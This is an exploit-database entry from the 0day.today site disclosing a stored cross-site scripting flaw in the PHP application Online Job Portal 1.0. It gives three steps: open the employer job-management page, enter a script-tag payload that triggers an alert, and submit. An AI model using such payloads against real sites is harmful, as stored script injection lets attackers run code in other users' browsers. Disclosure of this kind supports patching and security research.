[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Online Job Portal 1.0 - Cross Site Scripting (Stored) Vulnerability

Author
Akıner Kısa
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-35055
Category
web applications
Date add
19-10-2020
Platform
php
# Exploit Title: Online Job Portal 1.0 Cross Site Scripting (Stored)
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
# Version: 1.0
# Tested on: XAMPP 
# CVE : N/A

Proof of Concept:

1 - Open URL http://localhost/jobportal/Employer/ManageJob.php

2 - Fill in the blanks with this payload: "><script>alert (1)</script>

3 - And click submit button.

#  0day.today [2024-11-16]  #